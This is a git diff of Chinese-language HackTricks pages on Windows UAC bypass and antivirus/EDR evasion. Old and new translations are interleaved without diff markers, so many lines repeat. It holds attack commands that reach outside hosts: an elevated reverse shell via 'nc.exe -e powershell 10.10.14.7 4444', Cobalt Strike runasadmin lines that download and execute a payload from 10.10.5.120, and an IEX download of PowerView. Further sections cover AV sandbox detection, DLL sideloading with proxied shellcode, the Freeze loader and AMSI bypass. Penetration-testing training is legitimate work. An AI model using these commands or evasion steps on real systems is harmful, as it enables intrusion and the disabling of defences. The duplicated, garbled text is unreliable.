如果 **`0`**(默认),则 **内置管理员帐户可以** 执行远程管理任务;如果 **`1`**,则内置管理员帐户 **无法**行远程管理任务,除非 `LocalAccountTokenFilterPolicy` 设置为 `1`
#### 总结
* 如果 `EnableLUA=0`**不存在****任何人都没有 UAC**
* 如果 `EnableLua=1` **`LocalAccountTokenFilterPolicy=1`任何人都没有 UAC**
* 如果 `EnableLua=1` **`LocalAccountTokenFilterPolicy=0``FilterAdministratorToken=0`RID 500内置管理员没有 UAC**
* 如果 `EnableLua=1` **`LocalAccountTokenFilterPolicy=0``FilterAdministratorToken=1`,所有人都有 UAC**
* 如果 `EnableLUA=0`**不存在****没有 UAC 对任何人**
* 如果 `EnableLua=1` **`LocalAccountTokenFilterPolicy=1`,没有 UAC 对任何人**
* 如果 `EnableLua=1` **`LocalAccountTokenFilterPolicy=0``FilterAdministratorToken=0`,没有 UAC 对 RID 500内置管理员**
* 如果 `EnableLua=1` **`LocalAccountTokenFilterPolicy=0``FilterAdministratorToken=1`UAC 对所有人**
所有这些信息可以使用 **metasploit** 模块收集:`post/windows/gather/win_privs`
所有这些信息可以通过 **metasploit** 模块收集:`post/windows/gather/win_privs`
您还可以检查用户的组并获取完整性级别:
```
net user %username%
whoami /groups | findstr Level
```
## UAC绕过
## UAC 绕过
{% hint style="info" %}
请注意,如果您可以访问受害者的图形界面UAC绕过就很简单因为您可以在UAC提示出现时简单地点击“是”
请注意,如果您可以图形访问受害者UAC 绕过是直接的,因为您可以在 UAC 提示出现时简单地点击“是”
{% endhint %}
在以下情况下需要UAC绕过**UAC已激活您的进程在中间完整性上下文中运行且您的用户属于管理员组**。
在以下情况下需要 UAC 绕过:**UAC 已激活,您的进程在中等完整性上下文中运行,并且您的用户属于管理员组**。
值得一提的是,**如果UAC处于最高安全级别始终要绕过UAC要困难得多而如果它处于任何其他级别默认则要容易得多**。
重要的是要提到,如果 UAC 处于最高安全级别(始终),则**绕过 UAC 要比在其他任何级别(默认)下要困难得多**。
### UAC禁用
### UAC 禁用
如果UAC已被禁用`ConsentPromptBehaviorAdmin`是**`0`**),您可以使用类似以下内容**以管理员权限高完整性级别执行反向Shell**
如果 UAC 已经禁用(`ConsentPromptBehaviorAdmin` 为 **`0`**),您可以使用类似的方式**以管理员权限执行反向 shell**(高完整性级别)
```bash
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
```
#### 使用令牌复制绕过UAC
#### UAC 绕过与令牌复制
* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
### **非常**基本的UAC“绕过”(完全文件系统访问)
### **非常** 基本的 UAC "绕过"(完全文件系统访问)
如果您拥有一个属于管理员组的用户的shell您可以通过SMB文件系统本地共享**挂载C$**,然后在新磁盘中访问**文件系统中的所有内容**(甚至是管理员的主文件夹)。
如果你有一个属于管理员组的用户的 shell你可以 **通过 SMB文件系统将 C$ 共享挂载** 到一个新的磁盘上,这样你将 **访问到文件系统中的所有内容**(甚至是管理员的主文件夹)。
{% hint style="warning" %}
**看起来这个技巧不再起作用了**
**看起来这个技巧不再有效**
{% endhint %}
```bash
net use Z: \\127.0.0.1\c$
@ -137,9 +139,9 @@ cd C$
#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop
```
### 使用 Cobalt Strike 绕过 UAC
### UAC绕过与Cobalt Strike
只有在 UAC 没有设置为最高安全级别时Cobalt Strike 技术才能生效。
Cobalt Strike技术仅在UAC未设置为最高安全级别时有效
```bash
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
@ -151,18 +153,18 @@ runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-obj
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
```
**Empire**和**Metasploit**也有几个模块可以**绕过**用户账户控制(**UAC**
**Empire****Metasploit** 也有几个模块可以 **绕过** **UAC**
### KRBUACBypass
文档和工具在[https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
文档和工具在 [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
### UAC绕过利用
### UAC 绕过漏洞
[**UACME**](https://github.com/hfiref0x/UACME)是几个UAC绕过利用的**编译**集合。请注意您需要使用Visual Studio或MSBuild来**编译UACME**。编译将创建几个可执行文件(如`Source\Akagi\outout\x64\Debug\Akagi.exe`),您需要知道**您需要哪一个**。\
您应该**小心**,因为有些绕过会**提示其他程序**,这些程序会**警告用户**有事情发生。
[**UACME** ](https://github.com/hfiref0x/UACME) 是几个 UAC 绕过漏洞的 **汇编**。请注意,您需要 **使用 Visual Studio 或 msbuild 编译 UACME**。编译将创建几个可执行文件(如 `Source\Akagi\outout\x64\Debug\Akagi.exe`),您需要知道 **您需要哪个**。\
您应该 **小心**,因为某些绕过会 **提示其他程序**,这会 **警告** **用户** 有事情发生。
UACME有每个技术开始工作的**构建版本**。您可以搜索影响您版本的技术:
UACME **每个技术开始工作的构建版本**。您可以搜索影响您版本的技术:
```
PS C:\> [environment]::OSVersion.Version
@ -170,44 +172,61 @@ Major Minor Build Revision
----- ----- ----- --------
10 0 14393 0
```
### 更多UAC绕过
也可以使用 [这个](https://en.wikipedia.org/wiki/Windows\_10\_version\_history) 页面从构建版本中获取 Windows 版本 `1607`
这个[页面](https://en.wikipedia.org/wiki/Windows\_10\_version\_history)可以获取Windows版本`1607`的构建版本。
#### 更多 UAC 绕过
**所有**在这里用于绕过AUC的技术**都需要**与受害者建立一个**完整的交互式shell**一个常见的nc.exe shell是不够的)。
**所有**在这里使用的绕过 AUC 的技术 **都需要**与受害者的 **完整交互式 shell**(普通的 nc.exe shell 不够)。
你可以使用一个**meterpreter**会话。迁移到一个**Session**值等于**1**的**进程**
您可以使用 **meterpreter** 会话获取。迁移到 **Session** 值等于 **1****进程**
![](<../../.gitbook/assets/image (863).png>)
_explorer.exe_应该有效
_explorer.exe_ 应该可以工作
### 使用GUI的UAC绕过
### 带 GUI 的 UAC 绕过
如果你可以访问一个**GUI当你收到UAC提示时你可以直接接受**你不需要绕过它。因此访问GUI将允许你绕过UAC。
如果您可以访问 **GUI您只需在出现 UAC 提示时接受它**,您实际上不需要绕过它。因此,获取对 GUI 的访问将允许您绕过 UAC。
此外,如果你获得了某人正在使用的GUI会话可能通过RDP那里会有**一些作为管理员运行的工具**,你可以从中直接**以管理员身份运行**例如**cmd**而不会再次受到UAC的提示就像[**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)。这可能会更加**隐蔽**
此外,如果您获得了某人正在使用的 GUI 会话(可能通过 RDP**一些工具将以管理员身份运行**,您可以 **直接以管理员身份运行** 例如 **cmd**,而无需再次被 UAC 提示,如 [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)。这可能会更 **隐蔽**
### 嘈杂的暴力UAC绕过
### 嘈杂的暴力破解 UAC 绕过
如果你不在乎嘈杂,你可以始终**运行类似于**[**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin)这样的东西,**要求提升权限,直到用户接受为止**
如果您不在乎嘈杂,您可以始终 **运行类似** [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin) 的工具,它 **会请求提升权限,直到用户接受它**
### 你自己的绕过 - 基本UAC绕过方法论
### 您自己的绕过 - 基本 UAC 绕过方法
如果你看看**UACME**,你会注意到**大多数UAC绕过都滥用了Dll劫持漏洞**主要是将恶意dll写入_C:\Windows\System32_。[阅读这篇文章以了解如何找到Dll劫持漏洞](../windows-local-privilege-escalation/dll-hijacking/)。
如果您查看 **UACME**,您会注意到 **大多数 UAC 绕过利用 DLL 劫持漏洞**(主要是在 _C:\Windows\System32_ 中写入恶意 dll。 [阅读此内容以了解如何找到 DLL 劫持漏洞](../windows-local-privilege-escalation/dll-hijacking/)。
1. 找到一个将**自动提升权限**的二进制文件(检查当执行时它是否以高完整性级别运行)。
2. 使用procmon找到可以受到**DLL劫持**攻击的“**NAME NOT FOUND**”事件
3. 你可能需要**将**DLL**写入**一些**受保护的路径**比如C:\Windows\System32在那里你没有写入权限。你可以通过以下方式绕过这一点
1. **wusa.exe**Windows 7、8和8.1。它允许在受保护路径内提取CAB文件的内容因为这个工具是以高完整性级别执行的)。
2. **IFileOperation**Windows 10。
4. 准备一个**脚本**将你的DLL复制到受保护路径中并执行易受攻击和自动提升权限的二进制文件。
1. 找到一个**自动提升** 的二进制文件(检查它执行时是否以高完整性级别运行)。
2. 使用 procmon 查找 "**NAME NOT FOUND**" 事件,这些事件可能会受到 **DLL 劫持** 的影响
3. 您可能需要在某些 **受保护路径**(如 C:\Windows\System32**写入** DLL而您没有写入权限。您可以通过以下方式绕过此限制
1. **wusa.exe**Windows 7、8 和 8.1。它允许在受保护路径中提取 CAB 文件的内容(因为此工具是以高完整性级别执行的)。
2. **IFileOperation**Windows 10。
4. 准备一个 **脚本**,将您的 DLL 复制到受保护路径中,并执行易受攻击的自动提升二进制文件。
### 另一种UAC绕过技术
### 另一种 UAC 绕过技术
包括观察**自动提升权限的二进制文件**是否尝试**从注册表**中**读取**要**执行**的**二进制文件**或**命令**的**名称/路径**(如果二进制文件在**HKCU**中搜索这些信息,则更有趣)。
该技术是观察一个 **自动提升的二进制文件** 是否尝试 **从注册表中读取****执行****二进制文件****命令****名称/路径**(如果该二进制文件在 **HKCU** 中搜索此信息,则更有趣)。
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{% hint style="success" %}
学习和实践 AWS 黑客攻击:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客攻击: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,89 +1,89 @@
# 反病毒软件AV绕过
# Antivirus (AV) Bypass
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF版HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**本页由** [**@m2rc\_p**](https://twitter.com/m2rc\_p)**写!**
**本页由** [**@m2rc\_p**](https://twitter.com/m2rc\_p)**写!**
## **AV规避方法论**
## **AV 规避方法论**
目前AV使用不同的方法来检查文件是否恶意包括静态检测、动态分析以及更高级的EDR中的行为分析。
目前AV 使用不同的方法来检查文件是否恶意,包括静态检测、动态分析,以及对于更高级的 EDR行为分析。
### **静态检测**
静态检测通过在二进制文件或脚本中标记已知的恶意字符串或字节数组,以及从文件本身提取信息(例如文件描述、公司名称、数字签名、图标、校验和等)来实现。这意味着使用已知的公共工具可能更容易被发现,因为它们可能已经被分析并标记为恶意。有几种方法可以绕过这种类型的检测:
静态检测是通过标记已知的恶意字符串或字节数组在二进制文件或脚本中实现的,同时还提取文件本身的信息(例如,文件描述、公司名称、数字签名、图标、校验和等)。这意味着使用已知的公共工具可能更容易被捕获,因为它们可能已经被分析并标记为恶意。有几种方法可以绕过这种检测:
- **加密**
* **加密**
如果您加密二进制文件AV将无法检测到您的程序但您需要某种加载程序来解密并在内存中运行程序。
如果你加密了二进制文件AV 将无法检测到你的程序,但你需要某种加载程序来解密并在内存中运行程序。
- **混淆**
* **混淆**
有时您只需要更改二进制文件或脚本中的一些字符串就可以使其通过AV但这可能是一项耗时的任务具体取决于您尝试混淆的内容。
有时你只需要更改二进制文件或脚本中的一些字符串就可以通过 AV但这可能是一个耗时的任务具体取决于你想混淆的内容。
- **自定义工具**
* **自定义工具**
如果您开发自己的工具,就不会有已知的恶意签名,但这需要大量时间和精力。
如果你开发自己的工具,将不会有已知的恶意签名,但这需要大量时间和精力。
{% hint style="info" %}
检查Windows Defender静态检测的一个好方法是使用[ThreatCheck](https://github.com/rasta-mouse/ThreatCheck)。它基本上将文件分成多个段然后要求Defender分别扫描每个段这样它可以准确告诉您在二进制文件中有哪些被标记的字符串或字节。
检查 Windows Defender 静态检测的一个好方法是 [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck)。它基本上将文件分成多个部分,然后让 Defender 分别扫描每个部分,这样可以准确告诉你在二进制文件中标记的字符串或字节。
{% endhint %}
我强烈建议您查看这个关于实际AV规避的[YouTube播放列表](https://www.youtube.com/playlist?list=PLj05gPj8rk\_pkb12mDe4PgYZ5qPxhGKGf)。
我强烈建议你查看这个 [YouTube 播放列表](https://www.youtube.com/playlist?list=PLj05gPj8rk\_pkb12mDe4PgYZ5qPxhGKGf) 关于实用的 AV 规避
### **动态分析**
动态分析是指AV在沙箱中运行您的二进制文件并监视恶意活动例如尝试解密并读取浏览器密码对LSASS执行minidump等。这部分可能会更加棘手但以下是一些可以用来规避沙箱的方法
动态分析是指 AV 在沙箱中运行你的二进制文件并监视恶意活动(例如,尝试解密并读取浏览器的密码,执行 LSASS 的小转储等)。这一部分可能更难处理,但这里有一些你可以做的事情来规避沙箱
- **执行前休眠**具体取决于实现方式这可能是绕过AV动态分析的好方法。AV需要很短的时间来扫描文件以免打断用户的工作流程因此使用长时间的休眠可能会干扰二进制文件的分析。问题在于许多AV沙箱可能会根据实现方式跳过休眠。
* **执行前休眠** 根据实现方式,这可能是绕过 AV 动态分析的好方法。AV 扫描文件的时间非常短,以免打断用户的工作流程,因此使用长时间的休眠可以干扰二进制文件的分析。问题是许多 AV 的沙箱可以根据实现方式跳过休眠。
* **检查机器资源** 通常沙箱可用的资源非常少(例如,< 2GB RAM否则它们可能会减慢用户的机器你也可以在这里发挥创造力例如检查 CPU 的温度或风扇速度并不是所有内容都会在沙箱中实现
* **特定机器检查** 如果你想针对加入“contoso.local”域的用户的工作站你可以检查计算机的域以查看是否与指定的域匹配如果不匹配你可以让程序退出。
- **检查计算机资源**,通常沙箱的资源非常有限(例如< 2GB RAM否则可能会减慢用户的计算机您还可以在这里发挥创造力例如通过检查CPU的温度或甚至风扇转速不是所有内容都会在沙箱中实现
事实证明Microsoft Defender 的沙箱计算机名是 HAL9TH因此你可以在恶意软件引爆前检查计算机名如果名称匹配 HAL9TH则意味着你在 Defender 的沙箱中,因此可以让程序退出。
- **特定于机器的检查**如果您想针对加入“contoso.local”域的工作站用户进行操作可以检查计算机的域看看是否与您指定的域匹配如果不匹配您可以让程序退出。
<figure><img src="../.gitbook/assets/image (209).png" alt=""><figcaption><p>来源: <a href="https://youtu.be/StSLxFbVz0M?t=1439">https://youtu.be/StSLxFbVz0M?t=1439</a></p></figcaption></figure>
事实证明Microsoft Defender的沙箱计算机名是HAL9TH因此您可以在引爆前检查恶意软件中的计算机名如果名称与HAL9TH匹配则表示您在Defender的沙箱中因此可以让程序退出。
一些来自 [@mgeeky](https://twitter.com/mariuszbit) 的非常好的建议,用于对抗沙箱
<figure><img src="../.gitbook/assets/image (209).png" alt=""><figcaption><p>来源:<a href="https://youtu.be/StSLxFbVz0M?t=1439">https://youtu.be/StSLxFbVz0M?t=1439</a></p></figcaption></figure>
<figure><img src="../.gitbook/assets/image (248).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">红队 VX Discord</a> #malware-dev 频道</p></figcaption></figure>
[@mgeeky](https://twitter.com/mariuszbit)提供的其他一些针对沙箱的非常好的技巧
正如我们在这篇文章中之前所说,**公共工具**最终会被 **检测到**,所以你应该问自己一个问题:
<figure><img src="../.gitbook/assets/image (248).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev频道</p></figcaption></figure>
例如,如果你想转储 LSASS**你真的需要使用 mimikatz 吗**?或者你可以使用一个不太知名的项目来转储 LSASS。
正如我们在本文中之前所说,**公共工具**最终将**被检测到**,因此,您应该问自己一个问题:
例如如果您想转储LSASS**您真的需要使用mimikatz**吗还是您可以使用一个不太知名但也可以转储LSASS的项目。
正确答案可能是后者。以mimikatz为例它可能是AV和EDR中最被标记的恶意软件之一虽然项目本身非常酷但要绕过AV与其使用它来实现目标不如寻找其他替代方案。
正确的答案可能是后者。以 mimikatz 为例,它可能是被 AV 和 EDR 标记的最多的恶意软件之一,尽管该项目本身非常酷,但在绕过 AV 时使用它也是一场噩梦,因此只需寻找替代方案来实现你的目标。
{% hint style="info" %}
在修改用于规避的有效负载时请确保在defender中**关闭自动样本提交**,并且,请认真对待,**不要将其上传到VIRUSTOTAL**如果您的目标是长期实现规避。如果要检查特定AV是否检测到您的有效负载请在虚拟机上安装它尝试关闭自动样本提交并在那里测试直到您对结果满意为止。
在修改你的有效载荷以进行规避时,请确保 **关闭 Defender 的自动样本提交**,并且请认真考虑,**如果你的目标是长期规避,请不要上传到 VIRUSTOTAL**。如果你想检查你的有效载荷是否被特定 AV 检测到,请在虚拟机上安装它,尝试关闭自动样本提交,并在那里进行测试,直到你对结果满意为止。
{% endhint %}
## EXE与DLL
## EXEs DLLs
在可能的情况下,始终**优先使用DLL进行规避**根据我的经验DLL文件通常**检测和分析较少**因此这是一个非常简单的技巧可用于在某些情况下避免检测如果您的有效负载有某种以DLL运行的方式)。
每当可能时,总是 **优先使用 DLL 进行规避**根据我的经验DLL 文件通常 **被检测和分析的概率更低**,因此在某些情况下使用它是一种非常简单的技巧(当然前提是你的有效载荷有某种方式以 DLL 的形式运行)。
正如我们在这张图片中看到的Havoc的DLL有效负载在antiscan.me中的检测率为4/26而EXE有效负载的检测率为7/26。
正如我们在这张图片中看到的Havoc 的 DLL 有效载荷在 antiscan.me 上的检测率为 4/26而 EXE 有效载荷的检测率为 7/26。
<figure><img src="../.gitbook/assets/image (1130).png" alt=""><figcaption><p>antiscan.me对比普通Havoc EXE有效负载与普通Havoc DLL的检测率</p></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1130).png" alt=""><figcaption><p>antiscan.me 上普通 Havoc EXE 有效载荷与普通 Havoc DLL 的比较</p></figcaption></figure>
现在我们将展示一些您可以使用DLL文件的技巧以使其更加隐蔽。
## DLL 侧加载 & 代理
现在我们将展示一些你可以使用 DLL 文件的技巧,以便更加隐蔽。
**DLL 侧加载** 利用加载器使用的 DLL 搜索顺序,通过将受害应用程序和恶意载荷放置在一起来实现。
## DLL 侧载与代理
您可以使用[Siofra](https://github.com/Cybereason/siofra)和以下 PowerShell 脚本检查易受 DLL 侧加载影响的程序:
**DLL 侧载** 利用加载程序使用的 DLL 搜索顺序,通过将受害者应用程序和恶意有效载荷并排放置来实现。
你可以使用 [Siofra](https://github.com/Cybereason/siofra) 和以下 PowerShell 脚本检查易受 DLL 侧载影响的程序:
{% code overflow="wrap" %}
```powershell
@ -94,17 +94,19 @@ C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hija
```
{% endcode %}
这个命令将输出在"C:\Program Files\\"目录下易受DLL劫持影响的程序列表以及它们尝试加载的DLL文件。
此命令将输出“C:\Program Files\\”中易受DLL劫持的程序列表及其尝试加载的DLL文件。
我强烈建议你**自己探索DLL劫持/侧载程序**这种技术如果正确使用非常隐蔽但如果你使用公开已知的DLL侧载程序可能会很容易被发现
我强烈建议您**自己探索可被DLL劫持/侧载的程序**如果正确执行这种技术相当隐蔽但如果您使用公开已知的DLL侧载程序可能会很容易被抓住
仅仅通过放置一个恶意DLL并使用程序期望加载的名称是无法加载你的有效负载的因为程序期望在该DLL中有一些特定的函数为了解决这个问题,我们将使用另一种称为**DLL代理/转发**的技术
仅仅放置一个恶意DLL其名称是程序期望加载的并不会加载您的有效载荷因为程序期望该DLL中有一些特定的函数。为了解决这个问题,我们将使用另一种技术,称为**DLL代理/转发**。
**DLL代理**将程序从代理和恶意DLL发出的调用转发到原始DLL从而保留程序的功能并能够处理执行你的有效负载
**DLL代理**将程序从代理和恶意DLL发出的调用转发到原始DLL从而保留程序的功能并能够处理您的有效载荷的执行
我将使用[@flangvik](https://twitter.com/Flangvik/)的[SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy)项目。
以下是我遵循的步骤:
{% code overflow="wrap" %}
```
1. Find an application vulnerable to DLL Sideloading (siofra or using Process Hacker)
2. Generate some shellcode (I used Havoc C2)
@ -113,7 +115,7 @@ C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hija
```
{% endcode %}
最后一个命令将给我们2个文件一个DLL源代码模板和原始重命名的DLL。
最后一个命令将给我们两个文件:一个 DLL 源代码模板和重命名后的原始 DLL。
<figure><img src="../.gitbook/assets/sharpdllproxy.gif" alt=""><figcaption></figcaption></figure>
@ -127,19 +129,19 @@ C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hija
<figure><img src="../.gitbook/assets/dll_sideloading_demo.gif" alt=""><figcaption></figcaption></figure>
我们的shellcode使用[SGN](https://github.com/EgeBalci/sgn)编码和代理DLL在[antiscan.me](https://antiscan.me)上都有0/26的检测率!我会称之为成功。
我们的 shellcode使用 [SGN](https://github.com/EgeBalci/sgn) 编码)和代理 DLL 在 [antiscan.me](https://antiscan.me) 上的检测率为 0/26!我会称之为成功。
<figure><img src="../.gitbook/assets/image (193).png" alt=""><figcaption></figcaption></figure>
{% hint style="info" %}
**强烈建议**您观看[S3cur3Th1sSh1t的twitch VOD](https://www.twitch.tv/videos/1644171543)关于DLL Sideloading的内容还有[ippsec的视频](https://www.youtube.com/watch?v=3eROsG_WNpE)以更深入地了解我们讨论的内容。
**强烈推荐** 你观看 [S3cur3Th1sSh1t 的 twitch VOD](https://www.twitch.tv/videos/1644171543) 关于 DLL 侧载,以及 [ippsec 的视频](https://www.youtube.com/watch?v=3eROsG\_WNpE) 以更深入地了解我们讨论的内容。
{% endhint %}
## [**Freeze**](https://github.com/optiv/Freeze)
`Freeze是一个绕过EDR的载荷工具包使用挂起进程、直接系统调用和替代执行方法`
`Freeze 是一个用于通过挂起进程、直接系统调用和替代执行方法绕过 EDR 的有效载荷工具包`
您可以使用Freeze以隐秘的方式加载和执行您的shellcode。
你可以使用 Freeze 以隐秘的方式加载和执行你的 shellcode。
```
Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
@ -149,46 +151,46 @@ Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freez
<figure><img src="../.gitbook/assets/freeze_demo_hacktricks.gif" alt=""><figcaption></figcaption></figure>
{% hint style="info" %}
规避只是一场猫鼠游戏,今天有效的方法明天可能被检测出来,因此永远不要只依赖一个工具,如果可能的话,尝试链接多种规避技术
规避只是猫和老鼠的游戏,今天有效的方法明天可能会被检测到,因此永远不要仅依赖一个工具,如果可能,尝试将多个规避技术结合起来
{% endhint %}
## AMSI反恶意软件扫描接口
AMSI旨在防止"[无文件恶意软件](https://en.wikipedia.org/wiki/Fileless\_malware)"。最初,防病毒软件只能扫描**磁盘上的文件**,因此如果您可以在**内存中直接执行有效载荷**,那么防病毒软件无法阻止它,因为它没有足够的可见性。
AMSI的创建是为了防止“[无文件恶意软件](https://en.wikipedia.org/wiki/Fileless\_malware)”。最初AV只能扫描**磁盘上的文件**,因此如果你能够以某种方式**直接在内存中执行有效载荷**AV就无法采取任何措施来阻止它,因为它没有足够的可见性。
AMSI功能已集成到Windows的以下组件中。
AMSI功能集成在Windows的以下组件中。
- 用户帐户控制UAC提升EXE、COM、MSI或ActiveX安装
- PowerShell脚本、交互使用和动态代码评估
- Windows脚本宿主wscript.exe和cscript.exe
- JavaScript和VBScript
- Office VBA宏
* 用户帐户控制或UAC提升EXE、COM、MSI或ActiveX安装
* PowerShell脚本、交互使用和动态代码评估
* Windows脚本宿主wscript.exe和cscript.exe
* JavaScript和VBScript
* Office VBA宏
它允许防病毒解决方案通过以未加密和未混淆的形式公开脚本内容来检查脚本行为。
它允许杀毒软件通过以未加密和未混淆的形式暴露脚本内容来检查脚本行为。
运行`IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')`将在Windows Defender上产生以下警报。
运行 `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` 将在Windows Defender上产生以下警报。
<figure><img src="../.gitbook/assets/image (1135).png" alt=""><figcaption></figcaption></figure>
请注意,它在路径之前加上`amsi:`然后是脚本运行的可执行文件的路径本例中为powershell.exe
注意它是如何在脚本运行的可执行文件路径前加上 `amsi:`在这种情况下是powershell.exe。
我们没有将任何文件写入磁盘,但由于AMSI的存在仍然在内存中被捕获。
我们没有将任何文件写入磁盘,但仍然因为AMSI在内存中被捕获。
有几种方法可以规避AMSI
有几种方法可以绕过AMSI
- **混淆**
* **混淆**
由于AMSI主要用于静态检测,因此修改您尝试加载的脚本可能是规避检测的一种好方法。
由于AMSI主要依赖静态检测,因此修改你尝试加载的脚本可能是规避检测的好方法。
但是即使脚本有多个层AMSI也有解混淆脚本的能力因此取决于如何执行混淆混淆可能不是一个好选择。这使得规避并不是那么直截了当。尽管有时您只需要更改几个变量名就可以规避检测因此这取决于某些内容是否已被标记
然而AMSI有能力解混淆脚本即使它有多层因此混淆可能是一个糟糕的选择具体取决于其实现方式。这使得规避变得不那么简单。尽管有时你所需要做的只是更改几个变量名称你就可以成功因此这取决于某个内容被标记的程度
- **AMSI绕过**
* **AMSI绕过**
由于AMSI是通过将DLL加载到powershell也包括cscript.exe、wscript.exe等进程中来实现的因此即使作为非特权用户运行也很容易篡改它。由于AMSI实现中存在这个缺陷研究人员已经找到了多种规避AMSI扫描的方法。
由于AMSI是通过将DLL加载到powershell也包括cscript.exe、wscript.exe等进程中来实现的因此即使以非特权用户身份运行也可以轻松篡改它。由于AMSI实现中的这个缺陷研究人员发现了多种规避AMSI扫描的方法。
**强制错误**
强制AMSI初始化失败amsiInitFailed将导致当前进程不会启动扫描。最初由[Matt Graeber](https://twitter.com/mattifestation)披露,微软已经开发了一个签名来防止更广泛的使用。
强制AMSI初始化失败amsiInitFailed将导致当前进程不会启动扫描。最初这是由[Matt Graeber](https://twitter.com/mattifestation)披露的,微软已经开发了一个签名以防止更广泛的使用。
{% code overflow="wrap" %}
```powershell
@ -196,9 +198,9 @@ AMSI功能已集成到Windows的以下组件中。
```
{% endcode %}
